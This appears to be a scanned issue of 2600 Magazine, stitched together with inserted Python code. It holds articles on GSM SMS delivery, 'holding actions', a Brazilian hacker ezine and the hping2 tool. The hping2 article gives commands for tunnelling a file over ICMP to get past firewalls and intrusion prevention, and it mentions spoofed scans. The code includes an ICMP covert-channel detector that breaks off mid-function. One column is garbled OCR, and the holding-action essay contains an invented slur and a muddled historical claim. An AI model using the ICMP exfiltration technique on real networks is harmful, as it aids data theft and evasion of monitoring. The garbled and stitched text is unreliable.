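        return encoding, single, 1
    per_part = (PAYLOAD_BYTES - CONCAT_HEADER) * 8 // bits  # 153 or 67
    return encoding, per_part, math.ceil(units / per_part)


if __name__ == "__main__":
    print(len(pack_septets("A" * 160)), "bytes for 160 seven-bit characters")
    for sample in ("A" * 160, "A" * 161, "\u042f" * 70, "\u042f" * 71):
        print(len(sample), plan_sms(sample))
```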
To understand how an SMS message is delivered, it's important to first understand a little about how GSM switching works. So, here's a crash course.
HLR
When you sign up for service, your phone number, the IMSI from your SIM card, and information about the capabilities of your account are input into the Home Location Register (HLR). This is a database operated by your wireless carrier, and it largely controls what your handset is both allowed and configured to do on the network (e.g. place and receive calls, send and receive text messages, forward calls to voicemail, use data services, and so forth). The HLR also keeps (approximate) track of your location on the network, in order to deliver calls and messages appropriately. In general, each wireless carrier operates one HLR topology, and large carriers split up subscribers between HLR nodes. The HLR is the nerve center of a wireless carrier, and if it fails, a very bad day is guaranteed for the person who administers it. At a minimum, nobody will be able to receive incoming phone calls, text messages will be delayed, calls will not forward to voicemail, and self-important people in SUVs everywhere will be unable to use their BlackBerrys while running over old ladies in crosswalks. So, as you might imagine, an HLR outage means the carrier may lose thousands of dollars per minute. Fortunately, redundancy and failover capability are fairly sophisticated. For example, Nortel's NSS19 platform allows for both local and geographical redundancy. HLR databases themselves are also designed with a high degree of redundancy and fault tolerance, allowing rapid recovery in the event of failure.
MSC
An MSC is a Mobile Switching Center. In effect, this is a Central Office for mobile phones. However, unlike traditional wireline Central Offices, which generally cover only one city (or in large cities, as little as one neighborhood), MSCs generally cover an entire region. These incorporate all of the functionality you would expect from a modern Central Office, along with a lot of whiz-bang features specific to mobile phone applications (such as the VLR described below).
MSCs can be either local or gateway MSCs. A gateway MSC is analogous to a tandem switch, and can communicate fully with other wireless and wireline networks. A local MSC is analogous to a local switch, although these switches can often route directly to the PSTN (and increasingly, VoIP networks) for voice calls.
VLR
Your mobile phone will generally be registered in the Visitor Location Register (VLR) of the Mobile Switching Center (MSC) serving the area in which it is located (although the HLR does not necessarily have to be decoupled, so in smaller GSM systems the VLR may be the same as the HLR). The VLR retrieves a local copy of your subscriber profile from the HLR, so most routine queries can be processed against the VLR rather than the HLR. This minimizes load on slow and expensive inter-carrier SS7 (and sometimes even X.25) links and the HLR servers. These systems are also designed with a high degree of fault tolerance, because it's also bad if they fail. However, the failure of a VLR will cause only a localized outage. Failed calls will generally be forwarded to voicemail in the interim, and SMS messages will be held for delivery until the VLR is again operational.
MXE/MC
The MXE (also referred to as MC) handles messaging. On GSM systems, this includes voicemail, SMS, and fax features (yes, the GSM standard includes sending and receiving faxes for some reason).
SMSC
Hey, we finally got to the piece that really matters. The SMSC is the component of the MXE which handles SMS origination and termination. SMS messages sent or received generally pass from your handset to the MSC to the MXE to the SMSC, and then either in the reverse direction (for on-network SMS) or to the gateway MSC for inter-carrier delivery.
Message flow
I'm a visual person, so here's a visual depiction of how an SMS is sent. Read it from left to right:
Figure 1: Mobile SMS Origination
Diagram drawn by Carre
Note that the SMS protocol accounts for the unreliability of wireless networks by using an acknowledgment sequence.
Next, here's a visual depiction of how your phone receives SMS messages from the network. Read it from right to left:
Figure 2: Mobile SMS Termination
Diagram drawn by Carre
Note that the acknowledgment sequence is also end-to-end, as in Figure 1.
Billing
While the GSM standard defines how the SMS protocol works and the data structures associated with it, billing is left up to the carriers. This is a contentious issue, particularly overseas where carriers do not charge for receiving SMS messages. Unlike email, SMS is billed per message, and carriers will generally not deliver messages unless they have a billing arrangement with the originating carrier. This has given rise to inter-carrier SMS providers, such as VeriSign, who negotiate wholesale billing arrangements on behalf of carriers. Generally, in the absence of a billing arrangement, carriers will refuse delivery of SMS messages. This is a particularly glaring issue when using SMS short codes. For example, the popular 8762 (UPOC) short code is not available to Sprint subscribers, because Sprint lacks a billing arrangement with Dada (the owner of Upoc).
Well, it's the end of my shift here in the Central Office, so enjoy the rest of your summer and please wear earplugs if you dance near the big speakers. Instead, save your hearing for The Last HOPE in New York, where I'll be speaking this year!
by Barrett Brown
"holding" (hōl′diŋ)
1. in certain sports, the illegal use of the hands and arms to hinder the movements of an opponent
"action" (ak′shən)
1. the effect produced by something.
2. a) a military encounter
b) military combat in general
Everyone is familiar with what holding actions are; we experience them every day of our lives. What many people may not know is that holding actions can be very carefully planned using statistics, making them a powerful tool of manipulation.
First, let's acquaint ourselves more specifically with what a holding action is.
Scenario One: Let's say, for example, that you are trying to get a refund for some small item you bought but which you received in the mail broken. The item cost $30.00, but you paid for it, and you want to get what you paid for. You call the company and are greeted by a phone tree. The phone tree is the first step in the company's holding action against you. You spend forty minutes navigating around the tree, and you finally reach a customer service representative, who informs you that in order to get a refund or exchange, you need to have the original receipt, fill out some forms they send you in the mail, and send your item back to them. You wait for your forms in the mail, but three weeks later they haven't come. So you spend another forty minutes on the phone tree to reach another representative, who apologizes and says the forms will be sent to you. This step can be repeated as many times as necessary until you get so tired of wasting your time that you just give up on the refund entirely. This is an example of a successful holding action by the company against you. Through the use of phone trees and red tape, the company avoided spending money on you. In fact, because time is equal to money in most people's lives, they made you spend even more money.
Scenario Two: Now let's say, completely hypothetically, that you are an American president. Oh, I don't know, how about Ronald Reagan. And you are two weeks away from your re-election day. Something bad comes out in the news - for example, Reagan molests a Girl Scout - that threatens your numbers in the polls, and you need to distract the public just long enough to ensure your re-election. There happen to be US prisoners of war in Iran, and you make a secret deal with the Iranians that if they release the hostages the day after re-election, you will give them some guns or drugs or something. Then you go on TV and promise that if you get elected, the hostages will be released. This is another form of holding action which uses the media. The president does not need to prove the Girl Scout wrong or clear his own name. He just needs to hold the people's attention for two weeks, until he gets re-elected. Distraction holding action.
Scenario Three: You are a homeless heroin addict. You are sent to jail for a crime you did not commit. While in the city jail, awaiting trial, you are in excruciating agony because your body is suffering from opiate withdrawal. Every day that you are incarcerated is a day in agony. Your public defender tells you that you can plead guilty and get out in two days, or you can fight to prove your innocence, which will take months. You are caught in a holding action (as well as a holding cell), and most people in these conditions fold under the pressure.
Holding actions are used on us every day, in ever-increasing numbers. Major companies actually have statistics which tell them exactly what percentage of customers will hang up or reach the wrong person when calling an automated phone tree, and they count on those numbers. They save money with every customer that does not reach them, or so their logic goes. The main commodity which a holding action manipulates is time. Whether we realize it or not, time is money, and since corporations, private interest groups, and wealthy individuals have much more money and time than the average person, these large entities will always win any given holding action.
Let's examine scenario two again. A customer in this scenario who is somewhat poor may not have forty minutes to spend on a phone tree. Either they are busy working for minimum wage, or they are spending their free time doing laundry and shopping. A poor person often does not have the time to spend on red tape and will give up early, thus saving the manipulative entity in question from replacing their defective product. A wealthy individual in scenario two would have more time to wait on hold, or even a secretary to make the call instead, thus increasing the chances that they will end up getting what they paid for.
Now that we understand a little about how holding actions are used against us, let's think about how they can be used to our advantage. The basic idea is to stall for as long as possible until your enemies either give up, forget or lose the paperwork regarding you, or decide that it is costing them too much money, or until you are in a better position to resolve the matter.
The poor soul in scenario three could have fought his own holding action by insisting on a trial, but not a speedy one. The judicial system in the U.S. functions primarily on "plea-bargains," which are deals made with the District Attorney. Most courts have no interest in trials because they cost too much money and time. So in the case of scenario three, assuming the charge was small and the person had no prior record, they could insist on a trial. It would take a few months, but chances are good that the charges would be dropped when the DA realized that their own holding action was not working. A friend of mine did exactly this, going to court every month for three years, stalling the case. Every month the DA would offer a new deal, and every month my friend would say, "I want a trial." Finally, after they had postponed the trial to the farthest possible legal time limit, the DA made one last offer, which was fair.
Have an ugly looking credit report? File a dispute on every single bad mark you have. Companies, especially creditors, are routinely bought by other companies, and many times paperwork or data is lost in the transition. When you dispute a claim on your credit report, the burden of proof is on the company. They only have a limited amount of time to prove that you owe them money, or they have to drop the claim from your report. Because these companies are so busy, it is very common for claims to be dropped simply because the creditor did not have the time to find your file and send it to the credit reporting agency. In addition, if your claim is small, it costs the company more money to prove that you owe them than it does to just drop the whole matter. This is using a holding action to your advantage.
Another example is lawsuits. Part of the reason why large companies routinely settle stupid lawsuits for large sums of money is that they are aware of how much more money, time, and publicity it would cost them to go to trial.
Time and information are the two most important commodities in our world today. The more information you have about your opponent and about how their time is allocated, the better your ability to contrive ways to distract your opponent from using time against you. The more control you have over an opponent's time, the less they have over yours. The ever-growing complexity in bureaucracies, aided by the growth of technology, ensures that manipulating people's time is a trend which will only continue to grow and be refined in the years to come. The more you are aware of these processes, the better-equipped you will be to use them to your advantage.
Thirteen Years of Starting a Hacker Scene
by Derneval Ribeiro Rodrigues da Cunha
For those of you who don't remember me, I'm the one who wrote "Hacking in Brazil" and "Starting a Hacker Scene." Maybe one or two of you have heard of Brazilians on the internet. Unfortunately, there are a great many of them calling themselves hackers and defacing websites. No, I'm not the one who bullshitted those guys into doing electronic vandalism. What I did was to start writing the first Brazilian hacker ezine in 1994. The internet wasn't available back then - people could only learn about it at universities and in a few other places. It just so happened that I did know about it. And there I learned about hacker ethics, viruses, phreaking, and all that stuff. I was involved in setting up an ecology Internet discussion among elementary schools. Then I heard about a "Hacker and Virus Congress" in Buenos Aires, Argentina. It ran for about four days, which I used to learn and talk with people from Hacktic and 2600 and with several Argentine people connected with computer security, among other things.
Few people in South America had Internet accounts. Most things happened in BBSes, on Fidonet or the like. Computer viruses were the main subject when people talked about computer insecurity. But they generated a lot of press coverage in those days. It was, though, very difficult to get any information about anything like "dark subjects." Myself, I had to hack my way into an academic internet account. I did this legally, not by using somebody else's account. I'm not going to talk about bad connection lines; phone modems were everything but reliable. (I wrote about this in "Brazilian Phone System.") I'm talking about people using 600 bps, maybe 1200 bps, sometimes 2400 bps modems. Instead of downloading big files from a BBS, you'd rather choose the files first, then go there yourself with floppies to pick them up. I myself would use the internet only from university computers; I never had to use dial-ups to access anything. Computer students themselves didn't know much about it except what they learned from movies like Wargames. That was in the second biggest university in South America. Those were the "golden years."
So, what was my goal? Just to get people together, so they could exchange information. I had to have people to talk about. They had to know about hacking. I had to spread the word for that to happen, so that people all around Brazil - those that deserved to be called "hackers" - would know what it was all about and hold meetings. Later on, the thing would be to prepare for a Brazilian hacker conference. So I started the easiest way: by starting an electronic publication. This was when everybody was just starting to know about the internet, just before Brazilians could get commercial internet access. My ezine was the first on the scene.
My boss didn't fire me when he heard about my plans; he understood things. But everywhere I heard of, a bunch of people joined and started things. I, though, had to start on my own. I borrowed articles from the public domain here and there, asked for permission to publish this or that, sometimes rewrote things, and did some writing on my own. Some of the stuff was so good that it's still published today without my permission or anything else. And, even today, I haven't completely decided if I should sue the guys that did it. There were people who bought books because my article was in them.
Things worked just fine for the publication. My choice of writing in pure ASCII code helped it to be uploaded to and downloaded from BBSes all around the country and abroad, in Portuguese-speaking places like Portugal and Mozambique. Barata Eletrica ("Electric Cockroach") spread everywhere like a disease. It appeared in places like Usenet, like the 2600 list and soc.culture.brazil. Myself, I made it available for download from the EFF and etext.org. Check Google for the current web address or visit barataeletrica.cjb.net. The people from the computer science faculty of a federal university, UFSC, kept a mirror on their website for about a decade - and I've never set foot there; thanks to them! At my own University of Sao Paulo, they would not hear a thing about it; in fact, they hated me. I almost lost my access there but got it back months later.
Soon people started to write other, more aggressive publications, like the ezine Axur 05, Nethack, and a few others, mostly on BBSes. That was at the time of Mitnick's arrest. If someone wanted to be known as a hacker, he and his friends would write an ezine. Lots of
good information started to be spread around, like philes about how to get free phone calls in the Brazilian phone system. (They eventually fixed that.)
The ezine grew quite complex. For one thing, I started to enjoy writing. It became more than a hobby. It always took more time to write things. And if I could not enjoy reading it myself again, I would rewrite the article. The ezine, originally meant to be something simple, grew complex, with sections like a FAQ, about, history, better articles, and a news section that was so troublesome to make that I turned it into a blog (barataeletrica.blogspot.com). If I wrote something, there would be a reference or a link saying where I took it from.
People started offering services like how to improve my HTML (it sucks) and easy access of the web site - for free. I declined. I started it all alone; nobody wanted to spare time to help me. Once I was famous, who cares? Besides, a better ezine would involve getting more complex. My focus wasn't in delivering better things to the growing number of people who were getting Internet access. The way it was, I was getting three or four letters a day asking, "Can you teach me hacking?"
I could have gone corporate. But I would have had to charge for that. In fact, when I started the ezine, the freeware concept was not understood. For me, it meant that I would not have to worry about paying wages, taxes, revenue, income, consumer rights, and so on. I would have had to register the ezine; then I would have been a target. If anybody sued me and I lost, that would have been it. And the kind of articles I published were often in gray areas of the law. If you're a hired hand, you need to work eight hours a day, but if you're a boss, you work twice that much.
My opinion was quite respected. Among other things, I can say I started the talk about Linux in Brazil. Phiber Optik came here; I told everybody to ask him to compare Windows security versus FreeBSD. Newswriters did not know anything about it. I was also there to give support when an activist from Amnesty International, Fernanda Serpa, started the "Free Kevin Mitnick" movement in Brazil. Maybe I'll write about it someday. When there was talk about bringing Markoff and Shimomura to a US$400 per ticket conference to talk about "the pirate and the samurai," I wrote an article in the ezine. Later on, nobody talked about bringing those guys here to Brazil for a conference anymore. My task was completed. The "hacker scene"
the paper press started to run articles teaching bad things for fun. issue of the now-defunct Brazilian edition of Internet World surprised me in that way. Mostly, it had articles telling everything about hackers' bad deeds. Put together, the articles gave knowledge about how to nuke other PCs. My good luck was I declined an interview. Maybe I would have been considered part of the group. Other magazines also did similar articles. Some guys started to write books using material from the ezines. And these books were a hit, even if things in there didn't work anymore. I can trace today's Brazilian electronic vandalism back to those mags and books.
My "hacker" congress never came off. The internet was spreading fast, but I didn't have a computer science degree. My knowledge was mostly Unix-based, and it was quickly devalued. Like most dinosaurs, I didn't believe in a commercial Internet. Maybe it was a bad thing that I wasn't money driven. Instead of setting up an enterprise, I enrolled in a postgraduate course. Don't think that the people who started Yahoo! were more gifted than me. I took my motto "I login therefore I am" - check Google; I said it first - and began to gather all my experiences with the hacker scene into an academic work.
People kept pressing me to write a book about all my exploits rather than a thesis. And the fact is that I collected enough data to write a lot about those days. I could fill two or three books just with information from the ezine. Some day, I'll do it. But for the moment, writing a book in order to just earn money would be selling out. And I could already have done that even with a "I am a friend of Barata Eletrica's author" card. One ex-friend of mine got his US$20 debt pardoned just because he introduced me to his creditor - just like that. If I wanted to write about "how to hack things," I could have done it much earlier. I maybe even could have earned cash doing lectures somewhere, and got a Masters degree. I could also simply have stopped hacking and got a good job in computer security. But, one can't write a thesis and do computer security at the same time. And I'm still thinking about it, but it has to be outside Brazil.
In fact, I soon found out that some people were sticking with me because of the "dark side." Sometimes I even lost "friends" because they gave up on me writing about them. I always warned about my focus on hacker ethics and the pursuit of knowledge. I changed my writing
had happened. I t was no dream anymore. i n order to avoi d copycats. The ezi ne i s sti l l
There were some very strong meeti ngs, 2 600 about hacki ng, but i t now takes a much broader
meeti ngs, and peopl e were tal ki ng about i t vi ew. How wou l d you teach hacki ng wi thout
everywhere. And peopl e knew the di fference usi ng computers? Hacki ng computers i s not the
between good hackers and l amers. But then onl y way to l earn about hacki ng. Some peopl e
Pa
g
e 18
2600 Ma
g
azine
promi sed me that they woul d keep on readi ng.
And I kept wri ti ng the ezi ne and a bl og because
i t' s such a waste to stop . .
It sometimes pays off to do a blog. Once I posted that I needed a few memory chips for my old-fashioned computer. I live in Sao Paulo. One guy from Rio de Janeiro read it, asked for my postal address and sent the chips, along with other things: about 16 kg of hardware, a complete CPU he'd made up of old pieces he gathered from friends. He threw a party, people brought things, they set up a Pentium 233 with a 30 gig HD, and they sent it and some other things to me, by FedEx. I couldn't believe it and sent him some t-shirts by way of thanks. I still used that computer until last Christmas, when a big fan and friend of mine sent me a Pentium 4 with a 150 gig HD and a few science fiction magazines. Maybe that guy is one of the thirty-five that prevent God from destroying the Earth. I don't know.

The problem today with writing a hacker ezine and blog is that today, everybody's got much more access than at the time I started. And there are many people claiming hacker knowledge. Even YouTube has a video or two about computer insecurities. One doesn't have to go underground to learn about "dark subjects." One has to have the conscience, which is the main subject about which I used to write, right from the beginning. If you write about how to do it, that will get old soon. When you write about how to think about it, it will stick. People still can get old issues of my ezine and find good thinking material. That might save their butts one day.

Unfortunately, I could not write a thesis about what I did. The Portuguese language is tough to read. My not writing a book is also something to blame myself for. How could I write a book about "starting a hacker scene" and then get a "normal" job anywhere but in computer security? There was a "hacker" conference in Sao Paulo, where I live. I could not go. In the USA or Europe, it would be no problem. But not here. There were lots of TV cameras everywhere. No way. At that time, I was working right next to an office where people were trying to sue YouTube. I even knew which books of legislation were being consulted. These people next door did not know about my past, and why should they? Yet, a few weeks ago, I attended another security conference, YSTS. But there were fewer cameras and none from TV.

Also, people always charge you more if they know you're famous. For a time, I would even check famous people for stories about how to deal with fame. It's no easy task, but I believe that sometime in the future, everybody will have to learn about it, how to relate to the press and how to use fame for a purpose. People on the internet don't know this, and they lose great opportunities.

It's like that: for one thing or another, you get famous. Before you know it, it's gone. People have to consider that getting famous is no fairy tale. In order to make some good use of it, one has to know about it. If you publish something today in YouTube or in a blog, it will be remembered somewhere, sometime. You've changed, grown older, but your past is still there. Just like it was. I was very fortunate the way I wrote things. I never used an alias to write, and I have no regrets about it.

When you get famous, some people get to know you because they are getting famous at the same time, but in different places, with other occupations. Mauro Marcelo, who got appointed the chief of the Brazilian Intelligence Agency (ABIN), did know me. I could have interviewed him there and then, but that's another story, and a sort of funny one. Eventually, he was kicked off the job because of the intrigue there, which makes me think he's not such a bad guy; those guys from ABIN aren't popular. When he was there, he bothered to answer an email of mine. Who knows? Maybe someday I'll contact him again. He might have some good stories to talk about. He was, after all, the first Brazilian "Cyber" cop.

He wouldn't catch me, for sure. I stopped all "hacking" when I began writing the ezine. Maybe not all of it, but why bother? That magic word "please" works wonders. You just have to know who to ask. If the guy doesn't know you, just play that song, "Let me please to introduce myself, I'm a man." You can't always get what you want, but sometimes you do. I would never know how to stash things inside University of Sao Paulo computers without a little help from my friends. I would always sing "Don't you forget about me" for myself, later. You can get high doing things like these. Believe me.

After thirteen years of Barata Eletrica, is anybody snoring out there? It's been a great experience, being famous for writing an ezine. I did it mostly because of the readers. What a feeling when you meet someone who got his life changed because of an article of yours! I never got laid because of it, but I did learn a lot about a lot of topics, from public relations to law and journalism. Maybe someday, I'll get a job out of it.

I think everybody should try it. Someone said that if you don't like the news, you should go out and make some of your own. Everybody can help change the world with simple gestures. Just interact with your community. My ezine started like that: a publication for a few people using an internet-connected computer lab nearby. Think about it.
HPing (The Part I Forgot)

In my last article ("Essential Security Tools," 2600 Winter 2007-2008), I wrote about some security tools, told readers where to get them, and gave a basic introduction of what they do. Most astute readers may have noticed that the section on HPing was very brief. When I was drafting the article, I was moving subjects around, and so I misplaced the main body of my HPing section. When I received my copy of 2600 and noticed this, I firmly planted my face in the palm of my hand and let out a loud "D'oh!" To make up for it and to absolve myself of this error, I am dedicating this article entirely to the HPing utility.

HPing (http://www.hping.org) is a great tool to have. You can use it for very simple tests or you can set it up to do something more advanced, such as transfer files. Let's start off with the basic stuff.

HPing Basics

HPing, at its most basic, is a packet crafter. You can get a lot of use out of just this basic function. Let's examine using HPing to "ping" a TCP port:

    [root@doormouse ~]# hping2 localhost -S -p 22
    HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
    len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32792 rtt=0.2 ms

In this example, we've asked HPing to send the localhost TCP/SYN packets (-S), with the destination TCP port set to 22, which is for ssh. The reply packets we get are the next part of the TCP three-way handshake, with the SYN/ACK flags set. This is indicated in HPing by the flags=SA field. This tells us that the TCP port is open and that we are allowed to access that TCP port. This is useful in testing whether or not your firewall rules are set up properly. Let's say that you have a web server and that you want to ensure that people from the 10.20.30.0/24 network are allowed to access it. You can just HPing the server with the SYN flag set and see if you get a reply.

You can set all, some, or none of the TCP flags if you wish to check TCP stacks or your Intrusion Protection System (IPS). For example, if you have an IPS set up and you want to test your filters against odd TCP flag settings, you can use HPing to do that:

    [root@doormouse ~]# hping2 localhost -FPU -p 999
    HPING localhost (lo 127.0.0.1): FPU set, 40 headers + 0 data bytes
    len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=999 flags=RA seq=0 win=0 rtt=0.1 ms

In addition to TCP packets, HPing can send UDP. The next example shows UDP packets sent to port 0, which is not listening, on a Check Point SofaWare box:

    [root@doormouse ~]# hping2 210.210.210.1 -2
    HPING 210.210.210.1 (eth0 210.210.210.1): udp mode set, 28 headers + 0 data bytes
    ICMP Port Unreachable from ip=210.210.210.1 name=my.firewall

Even though nothing is listening on that port on that host, we still know that the IP address is alive. It should be noted that some firewall software and operating systems will just drop these packets without sending anything back.

You can even craft packets at the IP layer, though this can be a bit tricky, depending on the protocol that you are attempting to use. In the tcpdump output shown below, I used "hping2 localhost -0 -v -H 41" to send IP packets to IP protocol 41, which is IPv6-in-IPv4, without any payload:

    [root@doormouse ~]# tcpdump A ' . 1 ' 1` . 1 ! C proto 41
    tcpdump: listening on lo, link-type EN10MB
    00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 8251, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
        0x0000:  4500 0014 203b 0000 4029 5c84 7f00 0001  E... ;..@)\.....
        0x0010:  7f00 0001
    13:33:09.025631 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 41944, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
        0x0000:  4500 0014 a3d8 0000 4029 d8e6 7f00 0001  E.......@)......
        0x0010:  7f00 0001
    13:33:10.026089 00:00:00:00:00:00 > 00:00:00:00:00:00, ethertype IPv4 (0x0800), length 34: (tos 0x0, ttl 64, id 18791, offset 0, flags [none], proto IPv6 (41), length 20) 127.0.0.1 > 127.0.0.1: [|ip6]
        0x0000:  4500 0014 4967 0000 4029 3358 7f00 0001  E...Ig..@)3X....
        0x0010:  7f00 0001

The last of the basics I'm going to talk about is the ability to specify your source address. This is excellent for testing anti-spoofing features of your firewall or to perform "idle" scans. I leave that as a project for you to figure out on your own.

Now that you know how to craft basic packets with HPing, you may start to wonder why you would use this for anything except port scans or security-related measures. Imagine that you work for a managed service provider and that you need to monitor both system health and service health. You can incorporate HPing into your service health monitoring by setting up a basic script which will craft packets, send them to the service in question, deliver a payload if needed, and then report back to your management station whether or not the service is up, depending on the response received by HPing.
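The service-health check described above comes down to reading hping2's reply lines. The following Python is an added example, not code from the article or from the hping project: it classifies replies in the output format quoted in this article (SA means the port answered; RA or an ICMP Port Unreachable means the host is alive but the service is not) and reduces a run to up, down or no-reply. The function names, the use of hping2's -c count option in probe(), and the no-reply sample are assumptions introduced here.

```python
import re
import subprocess

# Line formats follow the hping2 output quoted in this article.
TCP_REPLY = re.compile(
    r"\bip=(?P<ip>\S+).*?\bsport=(?P<sport>\d+)\s+flags=(?P<flags>[A-Z]+)"
    r".*?\brtt=(?P<rtt>[\d.]+)\s*ms"
)
ICMP_ERROR = re.compile(r"^ICMP (?P<kind>.+?) from ip=(?P<ip>\S+)")
STATS = re.compile(r"(?P<tx>\d+) packets tra\w+, (?P<rx>\d+) packets received")


def classify_reply(line):
    """Map one hping2 output line to 'open', 'closed', 'filtered' or 'odd'.

    Returns None for lines that are not replies (banner, warnings, statistics).
    """
    line = line.strip()
    icmp = ICMP_ERROR.match(line)
    if icmp:
        # Port Unreachable: the host is alive but nothing listens on the port.
        # Any other ICMP error usually means a filter answered instead.
        return "closed" if "Port Unreachable" in icmp.group("kind") else "filtered"
    tcp = TCP_REPLY.search(line)
    if not tcp:
        return None
    flags = set(tcp.group("flags"))
    if {"S", "A"} <= flags:
        return "open"    # SYN/ACK: second step of the three-way handshake
    if "R" in flags:
        return "closed"  # RST or RST/ACK: the stack refused the segment
    return "odd"


def service_status(hping_output):
    """Reduce a whole hping2 run to a verdict a monitoring station can act on."""
    states = [s for s in map(classify_reply, hping_output.splitlines()) if s]
    stats = STATS.search(hping_output)
    sent = int(stats.group("tx")) if stats else None
    received = int(stats.group("rx")) if stats else len(states)
    if "open" in states:
        verdict = "up"
    elif states:
        verdict = "down"      # the host answered, the service did not
    else:
        verdict = "no-reply"  # dropped by a filter, or the host is unreachable
    return {"verdict": verdict, "states": states, "sent": sent, "received": received}


def probe(host, port, count=3):
    """Send `count` SYN probes with hping2 (needs root) and classify the result."""
    argv = ["hping2", host, "-S", "-p", str(port), "-c", str(count)]
    done = subprocess.run(argv, stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT, text=True)
    return service_status(done.stdout)


# Output quoted in the article.
SYN_22 = """HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32792 rtt=0.2 ms
"""
FPU_999 = """HPING localhost (lo 127.0.0.1): FPU set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=999 flags=RA seq=0 win=0 rtt=0.1 ms
"""
UDP_PORT0 = """HPING 210.210.210.1 (eth0 210.210.210.1): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=210.210.210.1 name=my.firewall
"""
# Constructed sample: a filter silently drops every probe.
NO_REPLY = """HPING 192.0.2.40 (eth0 192.0.2.40): S set, 40 headers + 0 data bytes

--- 192.0.2.40 hping statistic ---
3 packets tramitted, 0 packets received, 100% packet loss
"""

if __name__ == "__main__":
    for name in ("SYN_22", "FPU_999", "UDP_PORT0", "NO_REPLY"):
        print(name, service_status(globals()[name]))
```

A no-reply verdict is the case the article warns about: some firewalls and operating systems drop the probe without answering, so it cannot be told apart from a dead host by this test alone.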
Advanced Features

One of HPing's nice features is the ability to transfer files across a "ping" session. I've only done this with text files, but I'm sure that someone out there knows how to successfully transfer a binary file like an image. Suppose you have a text file that you need to transfer, but all the normal file transfer options like FTP(S), SFTP/SCP, and HTTP(S) are blocked by a firewall; however, ICMP is allowed out. You can use HPing to transfer the file across ICMP. First you will have to set your target server to be in a listen state:

    [root@doormouse ~]# hping2 localhost --listen signature --safe --icmp
    Warning: Unable to guess the output interface
    hping2 listen mode
    [main] memlockall(): Success
    Warning: can't disable memory paging!

Now that we have someone listening, let's transfer the file from our source machine:

    [root@doormouse temp]# hping2 localhost --icmp -d 100 --sign signature --file ./random.stuff
    HPING localhost (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
    [main] memlockall(): Success
    Warning: can't disable memory paging!
    len=128 ip=127.0.0.1 ttl=64 id=12770 icmp_seq=0 rtt=0.3 ms
    len=128 ip=127.0.0.1 ttl=64 id=12773 icmp_seq=1 rtt=0.1 ms
    len=128 ip=127.0.0.1 ttl=64 id=12775 icmp_seq=2 rtt=0.2 ms
    len=128 ip=127.0.0.1 ttl=64 id=12777 icmp_seq=3 rtt=0.2 ms
    --- localhost hping statistic ---
    4 packets tramitted, 4 packets received, 0% packet loss
    round-trip min/avg/max = 0.1/0.2/0.3 ms

The listening side will then show:

    hping2 listen mode
    [main] memlockall(): Success
    Warning: can't disable memory paging!
    Line 1
    Line 2
    Line 3
    Line 4
    End of Important File

Looks like we managed to transfer our important file successfully! Most people won't sit and examine ICMP logs, so you may be able to evade any firewall or IPS in the way.
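Seen from the monitoring side, a transfer like the one above has a recognisable shape: every echo request from one source starts with the same marker (the --sign value) while the rest of the payload changes and is mostly text. The following Python is an added example, not code from the article or from hping; the thresholds, function names and sample packets are constructed assumptions, and PAGE_PROTO41 is the header from the tcpdump output earlier in this article.

```python
import struct
from collections import defaultdict

def inet_checksum(data):
    """RFC 1071 ones'-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def parse_ipv4(pkt):
    """Return (protocol, src, dst, payload); raise ValueError if malformed."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if ihl < 20 or total_len < ihl or len(pkt) < total_len:
        raise ValueError("inconsistent lengths")
    if inet_checksum(pkt[:ihl]) != 0:
        raise ValueError("bad header checksum")
    src = ".".join(map(str, pkt[12:16]))
    dst = ".".join(map(str, pkt[16:20]))
    return pkt[9], src, dst, pkt[ihl:total_len]

def echo_request_data(pkt):
    """(src, data) for an ICMP echo request, None for any other packet."""
    proto, src, _dst, body = parse_ipv4(pkt)
    if proto != 1 or len(body) < 8 or body[0] != 8:
        return None
    return src, body[8:]

def common_prefix(blobs):
    """Longest byte string that every element of blobs starts with."""
    prefix = blobs[0]
    for blob in blobs[1:]:
        n = 0
        while n < min(len(prefix), len(blob)) and prefix[n] == blob[n]:
            n += 1
        prefix = prefix[:n]
    return prefix

def text_ratio(data):
    """Fraction of bytes that are printable ASCII, tab, CR or LF."""
    if not data:
        return 0.0
    return sum(32 <= c < 127 or c in (9, 10, 13) for c in data) / len(data)

def find_signed_icmp(packets, min_prefix=4, min_packets=3, min_text=0.8):
    """Report sources whose echo requests look like a signed data channel."""
    by_src = defaultdict(list)
    for pkt in packets:
        try:
            hit = echo_request_data(pkt)
        except ValueError:
            continue  # not parseable as IPv4: skip it
        if hit:
            by_src[hit[0]].append(hit[1])
    findings = []
    for src, datas in by_src.items():
        if len(datas) < min_packets:
            continue
        prefix = common_prefix(datas)
        tails = {d[len(prefix):] for d in datas}  # identical tails = ordinary ping
        if (len(prefix) >= min_prefix and len(tails) > 1
                and text_ratio(b"".join(datas)) >= min_text):
            findings.append({"src": src, "marker": prefix, "packets": len(datas)})
    return findings

def build_echo(src, dst, seq, data):
    """Build a constructed sample: IPv4 header + ICMP echo request + data."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, seq) + data
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
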